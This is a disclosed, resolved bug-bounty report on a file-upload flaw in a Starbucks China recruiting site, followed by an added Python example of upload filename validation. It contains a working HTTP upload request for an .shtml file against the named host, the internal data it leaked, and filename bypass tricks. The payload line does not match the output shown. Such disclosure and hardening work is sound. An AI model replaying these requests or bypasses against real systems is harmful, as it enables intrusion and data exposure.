
China - ecjobsdc.starbucks.com.cn html/shtml file upload vulnerability

High
Starbucks

Team Summary

Official summary from Starbucks

neweq discovered that ecjobsdc.starbucks.com.cn had a file upload vulnerability that permitted an attacker to upload html and shtml files which could then be accessed in a browser. @neweq — thank you for reporting this vulnerability.

Vulnerability Details

Technical details and impact analysis

Privilege Escalation
### 1. Summary

During the test, I found that ecjobsdc.starbucks.com.cn has an upload vulnerability: you can upload html and shtml format files, so you can read the server's intranet IP, the physical path of the website application, and the website's web.config file.

### 2. Vulnerability scope

https://ecjobsdc.starbucks.com.cn

### 3. Proof of exploit

By modifying the suffix of the filename, html and shtml files can be uploaded to this address, so that you can read the server's intranet IP, the physical path of the website application, and the configuration file of the website.

Vulnerability certificate

```
POST /recruitjob/hxpublic_v6/hxinterface6.aspx?_hxcategory=hx_filebox_upload_file HTTP/1.1
Host: ecjobsdc.starbucks.com.cn
Connection: close
Content-Length: 234
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryevPInYidBxSvSd06
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

------WebKitFormBoundaryevPInYidBxSvSd06
Content-Disposition: form-data; name="hxwebfileboxcontrol_upload_file_inputbox"; filename="xxx.shtml"
Content-Type: text/html

<?php echo 1111;>
------WebKitFormBoundaryevPInYidBxSvSd06--
```

Successfully read the website's REMOTE_ADDR, web path info, and web.config file.

```
DOCUMENT_NAME: D:\TrustHX\STBKSERM101\www_app\tempfiles\temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml
SERVER_SOFTWARE: Microsoft-IIS/8.5
SERVER_NAME: ecjobsdc.starbucks.com.cn
SERVER_PORT: 80
REMOTE_ADDR: 10.92.29.50
REMOTE_HOST: 10.92.29.50
D:\TrustHX\STBKSERM101\www_app\tempfiles\temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml
PATH_INFO: /recruitjob/tempfiles/temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
/recruitjob/tempfiles/temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <httpRedirect enabled="false" destination="https://ecjobs.starbucks.net" exactDestination="false" />
  </system.webServer>
</configuration>
```

{F349302} {F349303}

## Impact

Phishing attack, remote file reading
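The report shows the two ingredients of this class of bug: the server kept the client-supplied suffix (the stored file is `temp_uploaded_<guid>.shtml`, so only the stem was randomised), and the upload directory is served by IIS, whose ServerSideInclude handler processes `.shtml`/`.shtm`/`.stm` files and expands directives such as `#echo var` and `#include` (which is the general mechanism behind server variables like `REMOTE_ADDR` and file contents appearing in a served page). The following is an added example, not code from the report or from the affected site: it contrasts the kind of deny-list suffix check that a changed filename suffix bypasses with an allow-list check that normalises the name the way NTFS would before inspecting it, and generates a stored name that keeps only a validated extension. The allow-list contents, the function names and the non-report sample filenames are assumptions.

```python
"""Upload filename validation: a deny-list check that a changed suffix bypasses,
beside an allow-list check with Windows-aware normalisation.
Added example; not code from the report or from the affected application."""
import os
import re
import secrets

# A deny-list of "executable" suffixes. It is never complete: .shtml (IIS
# server-side includes) and .html (phishing pages) are not on it, which is
# exactly the "modify the suffix" bypass the report describes.
DENY_LIST = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".exe"}

# Assumed business need for this endpoint (a recruiting site taking resumes);
# the real list is whatever the application actually has to accept.
ALLOW_LIST = {".pdf", ".doc", ".docx", ".png", ".jpg", ".jpeg"}

_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
_FILENAME = re.compile(r'filename="([^"]*)"')


def filename_from_disposition(header: str) -> str:
    """Pull the client-supplied filename out of a multipart Content-Disposition line."""
    m = _FILENAME.search(header)
    return m.group(1) if m else ""


def _normalise(filename: str) -> str:
    """Reduce a client filename to the name NTFS would actually create.

    Windows strips trailing dots and spaces when a file is created, and
    "name::$DATA" addresses the default stream of "name", so both must be
    removed before the suffix is inspected. Directory components are dropped.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    base = base.split("::$DATA", 1)[0]
    return base.rstrip(". ")


def weak_check(filename: str) -> bool:
    """Deny-list check as commonly written: inspects only the raw suffix."""
    return os.path.splitext(filename)[1].lower() not in DENY_LIST


def hardened_check(filename: str) -> bool:
    """Allow-list check: the name must already be in normalised form, have exactly
    one extension, and that extension must be permitted. Anything that needed
    normalising is rejected rather than guessed at."""
    base = _normalise(filename)
    if base != filename or base.count(".") != 1:
        return False          # path parts, trailing dot/space, ::$DATA, or "cv.jpg.shtml"
    stem, ext = base.rsplit(".", 1)
    return bool(_SAFE_STEM.match(stem)) and "." + ext.lower() in ALLOW_LIST


def stored_name(filename: str) -> str:
    """Random server-side name that keeps only the validated, lower-cased suffix.

    Randomising the stem alone is not enough: the report's file was stored as
    temp_uploaded_<guid>.shtml, and the preserved .shtml is what routed it to
    the server-side-include handler.
    """
    if not hardened_check(filename):
        raise ValueError("disallowed upload filename: %r" % filename)
    ext = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed inputs; the first is the header line from the report's request.
    disposition = ('Content-Disposition: form-data; '
                   'name="hxwebfileboxcontrol_upload_file_inputbox"; filename="xxx.shtml"')
    for name in (filename_from_disposition(disposition), "shell.aspx.",
                 "cv.pdf::$DATA", "cv.jpg.shtml", "resume.pdf"):
        print(f"{name!r:18} weak={weak_check(name)!s:5} hardened={hardened_check(name)}")
```

Note that `shell.aspx.` passes the deny-list check because its last suffix is a bare dot, yet NTFS creates it as `shell.aspx`; the multipart `Content-Type` is equally client-controlled and is no substitute for the filename check. Validation alone is also only half the fix: the stored files should live in a directory from which IIS serves static content only, with no script or SSI handler mapped.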

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Privilege Escalation